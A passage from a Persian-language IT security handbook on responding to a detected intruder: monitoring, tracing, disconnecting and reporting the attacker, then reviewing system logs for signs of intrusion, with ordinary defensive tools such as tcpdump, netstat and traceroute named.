‫ﻻ ﻳـﻚ ﻭﺍﻛـﻨﺶ‬ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻬﺎﺟﻢ ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﻫﻢ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺭﻫﺎ ﻛﻨﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ ﻣﻌﻤـﻮ ﹰ‬ ‫‪.١‬‬
‫ﻼ ﺑﻪ ﻣﻌﻨﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻭﻱ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩﺍﻳﺪ ﺑﻪ ﺷﻤﺎ‪،‬‬ ‫ﺿﻌﻴﻒ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ‪ .‬ﭼﺸﻤﭙﻮﺷﻲ ﺍﺯ ﻭﺟﻮﺩ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﻴﺴﺘﻢ ﻋﻤ ﹰ‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﭼﻨﺎﻧﭽﻪ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺷﻤﺎ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕـﺮﻱ ﺻـﺪﻣﻪ ﻭﺍﺭﺩ‬
‫ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﻗﺎﻧﻮﻧﻲ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻣﺴﺌﻮﻝ ﺷﻨﺎﺧﺘﻪ ﺷﻮﻳﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺷـﺎﻳﺪ ﺍﮔـﺮ ﻣـﻲﺧﻮﺍﺳـﺘﻴﺪ ﻣـﻲﺗﻮﺍﻧـﺴﺘﻴﺪ ﺟﻠـﻮﻱ ﺍﻭ ﺭﺍ‬
‫ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺎ ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﭼﻪ ﻣﻲﺧﻮﺍﻫﺪ‪ .‬ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺴﻴﺎﺭ ﻣﺮﺍﻗـﺐ ﺑﺎﺷـﻴﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ‬ ‫‪.٢‬‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺫﺍﺗﹰﺎ ﺑﺪﺧﻮﺍﻩ ﻫﺴﺘﻨﺪ ﻭ ﺍﺯ ﮔﺮﻓﺘﺎﺭ ﺷﺪﻥ ﺩﺭ ﺩﺍﻡ ﻗﺎﻧﻮﻥ ﺑﺴﻴﺎﺭ ﻭﺣﺸﺖ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺍﮔﺮ ﺑﺎ ﺁﻧﻬﺎ ﺗﻤـﺎﺱ ﺑﮕﻴﺮﻳـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻫﻤﻪ ﭼﻴﺰ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺭﺩﭘﺎﻱ ﺧﻮﺩ ﭘﺎﻙ ﻛﻨﻨﺪ‪ .‬ﺳﻌﻲ ﻛﻨﻴـﺪ ﻣﻬـﺎﺟﻢ ﺭﺍ ﻗﺒـﻞ ﺍﺯ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ ﺭﺩﻳـﺎﺑﻲ‬
‫ﻧﻤﺎﻳﻴﺪ ﻭ ﺗﻤﺎﻡ ﺗﻤﺎﺳﻬﺎ ﺭﺍ ﻧﻴﺰ ﻣﺴﺘﻨﺪ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻬﺎﺟﻢ ﺭﺍ ﺗﺤﺖ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲﻓﻬﻤﻴﺪ ﻛﻪ ﻗﺼﺪ ﺗﻐﻴﻴﺮ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺍﺭﺩ‪ ،‬ﻳـﺎ‬ ‫‪.٣‬‬
‫ﺗﻨﻬﺎ ﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺯﻳﺮ ﻭ ﺭﻭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﻤﺎ ﻧﻤﻲﺩﺍﻧﻴﺪ ﺍﻳﻦ ﻣﻬﺎﺟﻢ ﭼﻪ ﻣﺪﺗﻲ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﺷﻤﺎﺳﺖ ﻭ ﺁﻧﭽﻪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻣﻲﮔﻴﺮﻳﺪ‪ ،‬ﺍﺗﻔﺎﻗﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻭ ﺭﺥ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺴﺘﻪ ﻣﺜﻞ ‪،TCP Dump‬‬
‫‪ Ethereal‬ﻳﺎ ‪ ،Snoop‬ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪﻫﺎﻱ ﻭﻱ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻭﺭﻳﺪ ﻳﺎ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺑـﻪ ‪hub‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻭﺻﻞ ﺑﺎﺷﺪ‪ ،‬ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻳﺠﺎﺩ ﻣﺰﺍﺣﻤﺖ‪ ،‬ﺗﻤﺎﻡ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻭ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻮﺩﻡ ﻳﺎ ﭘﻮﺭﺕ ﺳﺮﻳﺎﻝ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻣﺘﺼﻞ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺘﻌـﺪﺩ ﺩﻳﮕـﺮﻱ‬
‫ﺑــﺮﺍﻱ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﻭﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﻧــﺪ‪ ،‬ﻣﺜــﻞ ‪ rtty ،conserver ،ttywatch‬ﻭ ‪ .ser2net‬ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﺑــﻪ ﻃــﻮﺭ ﺩﻗﻴــﻖ ﻭ‬
‫ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﻮﺭﺕ ﺳﺮﻳﺎﻝ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﺣﺘـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ‪pseudo-tty‬ﻫﺎ ﻫﻢ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳـﺖ ﻛـﻪ ﻣﻬـﺎﺟﻢ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺎﻧﻨﺪ ‪ SSH‬ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬

‫ﺩﺭ ﺑﺮﺧﻲ ﻛﺸﻮﺭﻫﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﺪ‪ ،‬ﻳﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺗﻲ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷـﺪ ﻛـﻪ ﺩﺭ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﺍﺯ ﻃـﺮﻑ‬
‫ﺷﺮﻛﺖ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﮔﻔﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺍﺗﺼﺎﻻﺕ ﺭﺍ ﺭﺩﮔﻴﺮﻱ ﻭ ﻣﻬﺎﺟﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺎ ﺗﻠﻔﻦ ﺑﺎ ﺷﻤﺎ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ‬ ‫‪.٤‬‬
‫ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﺑﺮﺧﻲ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻳـﺎ ﺭﺩ ﻭﻱ ﺭﺍ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﺳﺘﻮﺭ ‪ who‬ﻳﺎ ‪ netstat‬ﺳـﺮﻳﻌﹰﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺭﺍﻳﺎﻧـﺔ ﺳﺮﭼـﺸﻤﻪ ﺍﻳـﻦ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٣٤‬‬

‫ﺍﺗﺼﺎﻝ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ‪ .‬ﺳﭙﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺭﺍﻫﺒﺮ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﺑﻴﺸﺘﺮ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ )ﺍﻟﺒﺘـﻪ ﺣﺘﻤـﹰﺎ ﺑـﺎ ﺗﻠﻔـﻦ!(؛ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻻ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ‪ whois‬ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻳﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﮔﺰﻳﻨـﺔ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﺗﻤﺎﺱ ﺑﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺩﮔﻴﺮﻱ ﻣﺴﻴﺮ ﺍﺳﺖ )ﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻧﺎﻡ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ traceroute‬ﻳﺎ ‪ tracert‬ﺑﺎﺷﺪ(‪ .‬ﺍﮔﺮ ﺗﻤﺎﻡ ﺍﻳﻦ‬
‫ﺭﺍﻫﻬﺎ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻛﺎﺭﺑﺮ ‪ root‬ﻳﺎ ‪ postmaster‬ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﺒﺪﺃ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﺑﺎ ﺷﻤﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻧﻔﻮﺫ ﺣﺮﻓﻲ ﻧﺰﻧﻴﺪ‪ ،‬ﭼﻮﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ‬
‫ﻧﻴﺰ ﺗﺤﺖ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺎ ﺧﺎﺗﻤﺔ ﭘﺮﺩﺍﺯﻩ‪ ،‬ﻗﻄﻊ ﻣﻮﺩﻡ ﻳﺎ ﺷﺒﻜﻪ‪ ،‬ﻭ ﻳﺎ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺗﺼﺎﻝ ﻣﻬﺎﺟﻢ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﻗﻄﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧـﻪ ﺳـﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺵ‬ ‫‪.٥‬‬
‫ﺑﺮﺍﻱ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮ ﻋﻤﻞ ﺩﻳﮕﺮ ‪ -‬ﺍﺯ ﺟﻤﻠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺑﻴﺸﺘﺮ ‪ -‬ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺍﻳﻦ ﻋﻤﻞ‬
‫ﺑﺴﻴﺎﺭ ﺧﺸﻦ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺟﻠﻮﻱ ﻣﻬﺎﺟﻢ ﺭﺍ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﻛﺎﺭ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﺭﺍ ﻧﻴﺰ ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻣﻲﻛﻨـﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﻛﻪ ﺭﻭﺯﻱ ﺩﺭ ﺩﺍﺩﮔﺎﻩ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ )ﻣﺎﻧﻨﺪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ( ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﺩ‪ ،‬ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺗﺮﺍﻭﺍﻫﺎﻳﻲ ﻛﻪ‬
‫ﻱ ﻣﺠـﺪﺩ‪ ،‬ﺻـﺪﻣﺎﺗﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﺩ‪ .‬ﺑﻌـﻼﻭﻩ‬ ‫ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻗﺮﺍﺭﺩﺍﺩﻩ ﺷﺪﻩ‪ ،‬ﺩﺭ ﺯﻣﺎﻥ ﺭﺍﻩﺍﻧﺪﺍﺯ ﹺ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻨﺪ ﻗﻄﻊ ﻧﺎﮔﻬﺎﻧﻲ ﺑﺮﻕ ﺭﺍ ﺗﺤﻤﻞ ﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺸﻴﺪﻥ ﺩﻭﺷﺎﺧﻪ ﺻﺪﻣﺎﺗﻲ ﺑﻴﺶ ﺍﺯ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺁﻭﺭﺩ‪.‬‬
‫ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ ps‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻭ ﭘـﺲ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻭ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﻌﻮﻳﺾ ﻛﺮﺩﻳـﺪ‪ ،‬ﺑـﺎ ﺩﺳـﺘﻮﺭ ‪ kill‬ﺁﻥ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺭﺍ ﺧﺎﺗﻤـﻪ ﺩﻫﻴـﺪ‪ .‬ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫‪ Task Manager ،Windows‬ﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺑﺮﺍﻱ ﺩﻭﺭ ﺭﻳﺨﺘﻦ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻥ‬
‫ﻼ ﺑﺎ ﻛﺸﻴﺪﻥ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﺗﺼﺎﻝ ﻭﻱ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺷﻤﺎﺭﺓ ﺷـﻤﺎ ﺭﺍ ﮔﺮﻓﺘـﻪ ﺑﺎﺷـﺪ‬ ‫ﺍﻭ ﺁﻣﺪﻩ‪ ،‬ﻳﺎ ﻛ ﹰ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻮﺩﻡ ﺭﺍ ﺧﺎﻣﻮﺵ ﻛﻨﻴﺪ ﻳﺎ ﺳﻴﻢ ﺁﻧﺮﺍ ﺍﺯ ﭘﺸﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻴﺮﻭﻥ ﺑﻜﺸﻴﺪ‪.‬‬
‫ﺑﺎ ‪ ISP‬ﺧﻮﺩ‪ ،‬ﻳﻚ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ‪ ،‬ﻳﺎ ﻳﻚ ﻣﺴﺌﻮﻝ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺭﺍ ﺑﻪ ﺍﻃﻼﻉ ﺁﻧﺎﻥ ﺑﺮﺳﺎﻧﻴﺪ‪.‬‬ ‫‪.٦‬‬

‫ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ‬
‫ﺍﺩﺍﻣﺔ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻓﺼﻞ ﺍﺧﺘﺼﺎﺹ ﺑﻪ ﺍﻳﻦ ﺩﺍﺭﺩ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺗﺮﻣﻴﻢ ﻭ ﺗﻤﻴﺰﻛﺎﺭﻱ ﺷﻮﻧﺪ‪.‬‬

‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺤﻠﻴﻞ ﻛﻨﻴﺪ‬


‫ﺍﮔﺮ ﺣﺘﻲ ﻣﻬﺎﺟﻢ ﺭﺍ ﺣﻴﻦ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﻧﮕﺮﻓﺘﻴﺪ‪ ،‬ﺑﺎﺯ ﻫﻢ ﺑﺎ ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺛﺒﺘﻬﺎﻱ ﺳﻴـﺴﺘﻢ‪ ،‬ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﻣﻮﻓﻘﻴـﺖ ﺩﺭ ﺭﺩﻳـﺎﺑﻲ‬
‫ﻼ‪:‬‬
‫ﻣﻬﺎﺟﻢ ﺩﺍﺭﻳﺪ‪ .‬ﺑﺪﻧﺒﺎﻝ ﺛﺒﺘﻬﺎﻱ ﻏﻴﺮﻋﺎﺩﻱ ﺑﮕﺮﺩﻳﺪ؛ ﻣﺜ ﹰ‬
‫ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺭ ﺳﺎﻋﺎﺕ ﻏﻴﺮﻋﺎﺩﻱ؛‬ ‫•‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻳﻬﺎﻱ ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻄﻮﺭ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ؛‬ ‫•‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﺎﻋﺖ ﺳﻴﺴﺘﻢ ﺑﺪﻭﻥ ﻫﻴﭻ ﺗﻮﺟﻴﻪ ﺧﺎﺹ؛‬ ‫•‬
‫ﭘﻴﻐﺎﻣﻬﺎﻱ ﻧﺎﻣﻌﻤﻮﻝ ﺧﻄﺎ ﺍﺯ ‪daemon‬ﻫﺎﻱ ‪ ،FTP ،Mailer‬ﻳﺎ ﺳﺎﻳﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ؛‬ ‫•‬
‫ﺗﻼﺷﻬﺎﻱ ﻭﺭﻭﺩ ﻧﺎﻣﻮﻓﻖ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺖ؛‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﻣﺸﻜﻮﻙ ﺍﺯ ﺩﺳﺘﻮﺭ ‪su‬؛ ﻭ‬ ‫•‬
‫ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺷﺒﻜﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻧﺎﺁﺷﻨﺎ‪.‬‬ ‫•‬
‫‪٤٣٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻻ ﺗﻤﺎﻡ ﻧﺸﺎﻧﻪﻫﺎﻱ ﻭﺭﻭﺩ ﺧـﻮﺩ ﺭﺍ‬


